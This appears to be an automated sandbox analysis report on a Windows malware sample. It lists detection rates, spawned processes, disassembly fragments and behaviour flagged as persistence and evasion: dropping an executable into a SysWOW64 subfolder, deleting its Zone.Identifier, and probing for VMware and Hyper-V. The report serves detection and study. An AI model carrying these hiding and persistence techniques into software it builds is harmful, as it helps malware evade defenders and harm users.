Source: cK2ClsvtJE.exe | Metadefender: Detection: 43%
Source: cK2ClsvtJE.exe | ReversingLabs: Detection: 72%
Source: unknown | Process created: C:\Users\user\Desktop\cK2ClsvtJE.exe 'C:\Users\user\Desktop\cK2ClsvtJE.exe'
Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -p -s NgcSvc
Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s NgcCtnrSvc
Source: unknown | Process created: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exe C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exe
Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown | Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\cK2ClsvtJE.exe | Process created: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exe C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exe
Source: C:\Windows\System32\svchost.exe | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: C:\Users\user\Desktop\cK2ClsvtJE.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Users\user\Desktop\cK2ClsvtJE.exe | Code function: 1_2_02A51030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,
Source: C:\Users\user\Desktop\cK2ClsvtJE.exe | Code function: 1_2_02F260F0 push ecx; mov dword ptr [esp], 0000A172h
Source: C:\Users\user\Desktop\cK2ClsvtJE.exe | Code function: 1_2_02F262D0 push ecx; mov dword ptr [esp], 00001969h
Source: C:\Users\user\Desktop\cK2ClsvtJE.exe | Code function: 1_2_02F261D0 push ecx; mov dword ptr [esp], 00004B56h
Source: C:\Users\user\Desktop\cK2ClsvtJE.exe | Code function: 1_2_02F261B0 push ecx; mov dword ptr [esp], 000003A6h
Source: C:\Users\user\Desktop\cK2ClsvtJE.exe | Code function: 1_2_02F262A0 push ecx; mov dword ptr [esp], 0000BFAAh
Source: C:\Users\user\Desktop\cK2ClsvtJE.exe | Code function: 1_2_02F26090 push ecx; mov dword ptr [esp], 0000BAD9h
Source: C:\Users\user\Desktop\cK2ClsvtJE.exe | Code function: 1_2_02F26180 push ecx; mov dword ptr [esp], 0000D106h
Source: C:\Users\user\Desktop\cK2ClsvtJE.exe | Code function: 1_2_02F26240 push ecx; mov dword ptr [esp], 00008F23h
Source: C:\Users\user\Desktop\cK2ClsvtJE.exe | Code function: 1_2_02F26140 push ecx; mov dword ptr [esp], 00004AF2h
Source: C:\Users\user\Desktop\cK2ClsvtJE.exe | Code function: 1_2_02F26320 push ecx; mov dword ptr [esp], 00009128h
Source: C:\Users\user\Desktop\cK2ClsvtJE.exe | Code function: 1_2_02F26220 push ecx; mov dword ptr [esp], 00004B50h
Source: C:\Users\user\Desktop\cK2ClsvtJE.exe | Code function: 1_2_02A17EBE push ecx; mov dword ptr [esp], 00009128h
Source: C:\Users\user\Desktop\cK2ClsvtJE.exe | Code function: 1_2_02A17E3E push ecx; mov dword ptr [esp], 0000BFAAh
Source: C:\Users\user\Desktop\cK2ClsvtJE.exe | Code function: 1_2_02A17E6E push ecx; mov dword ptr [esp], 00001969h
Source: C:\Users\user\Desktop\cK2ClsvtJE.exe | Code function: 1_2_02A28B8F push edi; iretd
Source: C:\Users\user\Desktop\cK2ClsvtJE.exe | Code function: 1_2_02A33FD9 push ss; iretd
Source: C:\Users\user\Desktop\cK2ClsvtJE.exe | Code function: 1_2_02A17C8E push ecx; mov dword ptr [esp], 0000A172h
Source: C:\Users\user\Desktop\cK2ClsvtJE.exe | Code function: 1_2_02A3449C push ebx; iretd
Source: C:\Users\user\Desktop\cK2ClsvtJE.exe | Code function: 1_2_02A3449C push FFFFFF95h; iretd
Source: C:\Users\user\Desktop\cK2ClsvtJE.exe | Code function: 1_2_02A17CDE push ecx; mov dword ptr [esp], 00004AF2h
Source: C:\Users\user\Desktop\cK2ClsvtJE.exe | Code function: 1_2_02A17C2E push ecx; mov dword ptr [esp], 0000BAD9h
Source: C:\Users\user\Desktop\cK2ClsvtJE.exe | Code function: 1_2_02A17DBE push ecx; mov dword ptr [esp], 00004B50h
Source: C:\Users\user\Desktop\cK2ClsvtJE.exe | Code function: 1_2_02A17DDE push ecx; mov dword ptr [esp], 00008F23h
Source: C:\Users\user\Desktop\cK2ClsvtJE.exe | Code function: 1_2_02A17D1E push ecx; mov dword ptr [esp], 0000D106h
Source: C:\Users\user\Desktop\cK2ClsvtJE.exe | Code function: 1_2_02A17D6E push ecx; mov dword ptr [esp], 00004B56h
Source: C:\Users\user\Desktop\cK2ClsvtJE.exe | Code function: 1_2_02A17D4E push ecx; mov dword ptr [esp], 000003A6h
Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exe | Code function: 4_2_02926090 push ecx; mov dword ptr [esp], 0000BAD9h
Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exe | Code function: 4_2_02926180 push ecx; mov dword ptr [esp], 0000D106h
Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exe | Code function: 4_2_029261B0 push ecx; mov dword ptr [esp], 000003A6h
Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exe | Code function: 4_2_029262A0 push ecx; mov dword ptr [esp], 0000BFAAh
Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exe | Code function: 4_2_029262D0 push ecx; mov dword ptr [esp], 00001969h

Persistence and Installation Behavior:

Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Users\user\Desktop\cK2ClsvtJE.exe | Executable created and started: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exe
Source: C:\Users\user\Desktop\cK2ClsvtJE.exe | PE file moved: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exe

                Hooking and other Techniques for Hiding and Protection:

                Hides that the sample has been downloaded from the Internet (zone.identifier)
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exe File opened: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exe:Zone.Identifier read attributes | delete
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exe Code function: ChangeServiceConfig2W,RtlAllocateHeap,QueryServiceConfig2W,CloseServiceHandle,EnumServicesStatusExW,GetTickCount,RtlAllocateHeap,RtlAllocateHeap,HeapFree,RtlFreeHeap,
                Source: C:\Windows\System32\svchost.exe TID: 6700 Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
                Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exe File Volume queried: C:\ FullSizeInformation
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exe Code function: 1_2_02F23A20 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,_snwprintf,HeapFree,FindClose,
                Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exe Code function: 4_2_02923A20 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,_snwprintf,HeapFree,FindClose,
                Source: svchost.exe, 00000006.00000002.238658443.00000289C3D40000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.289264774.0000026208340000.00000002.00000001.sdmp, svchost.exe, 0000000E.00000002.485679936.000001F7576C0000.00000002.00000001.sdmp, svchost.exe, 00000014.00000002.309956263.00000273636A0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                Source: svchost.exe, 00000007.00000002.488872425.000002384C65E000.00000004.00000001.sdmp Binary or memory string: @Hyper-V RAW
                Source: svchost.exe, 0000000D.00000002.484790522.00000233F8A02000.00000004.00000001.sdmp Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
                Source: GlobCollationHost.exe, 00000004.00000003.362692520.0000000002A49000.00000004.00000001.sdmp, svchost.exe, 00000007.00000002.488839212.000002384C647000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
                Source: svchost.exe, 00000006.00000002.238658443.00000289C3D40000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.289264774.0000026208340000.00000002.00000001.sdmp, svchost.exe, 0000000E.00000002.485679936.000001F7576C0000.00000002.00000001.sdmp, svchost.exe, 00000014.00000002.309956263.00000273636A0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                Source: svchost.exe, 00000006.00000002.238658443.00000289C3D40000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.289264774.0000026208340000.00000002.00000001.sdmp, svchost.exe, 0000000E.00000002.485679936.000001F7576C0000.00000002.00000001.sdmp, svchost.exe, 00000014.00000002.309956263.00000273636A0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                Source: svchost.exe, 0000000D.00000002.485230682.00000233F8A40000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000002.485004591.000001F757040000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.484791655.000002C702229000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: svchost.exe, 00000006.00000002.238658443.00000289C3D40000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.289264774.0000026208340000.00000002.00000001.sdmp, svchost.exe, 0000000E.00000002.485679936.000001F7576C0000.00000002.00000001.sdmp, svchost.exe, 00000014.00000002.309956263.00000273636A0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exe Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exe Code function: 1_2_02A51030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exe Code function: 1_2_02F24190 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exe Code function: 1_2_02F25140 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exe Code function: 1_2_02A16CDE mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exe Code function: 1_2_02A10456 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exe Code function: 1_2_02A15D2E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exe Code function: 1_2_02A1095E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exe Code function: 1_2_02A51030 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exe Code function: 4_2_02924190 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exe Code function: 4_2_02925140 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exe Code function: 4_2_028A6CDE mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exe Code function: 4_2_028A0456 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exe Code function: 4_2_028A5D2E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exe Code function: 4_2_028A095E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exe Code function: 4_2_028E1030 mov eax, dword ptr fs:[00000030h]
                Source: GlobCollationHost.exe, 00000004.00000002.486034143.0000000001490000.00000002.00000001.sdmp, svchost.exe, 00000005.00000002.486209677.000001C383260000.00000002.00000001.sdmp Binary or memory string: Program Manager
                Source: GlobCollationHost.exe, 00000004.00000002.486034143.0000000001490000.00000002.00000001.sdmp, svchost.exe, 00000005.00000002.486209677.000001C383260000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
                Source: GlobCollationHost.exe, 00000004.00000002.486034143.0000000001490000.00000002.00000001.sdmp, svchost.exe, 00000005.00000002.486209677.000001C383260000.00000002.00000001.sdmp Binary or memory string: Progman
                Source: GlobCollationHost.exe, 00000004.00000002.486034143.0000000001490000.00000002.00000001.sdmp, svchost.exe, 00000005.00000002.486209677.000001C383260000.00000002.00000001.sdmp Binary or memory string: Progmanlock
                Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jcp VolumeInformation
                Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jtx VolumeInformation
                Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\store.vol VolumeInformation
                Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\store.jfm VolumeInformation
                Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\tmp.edb VolumeInformation
                Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
                Sou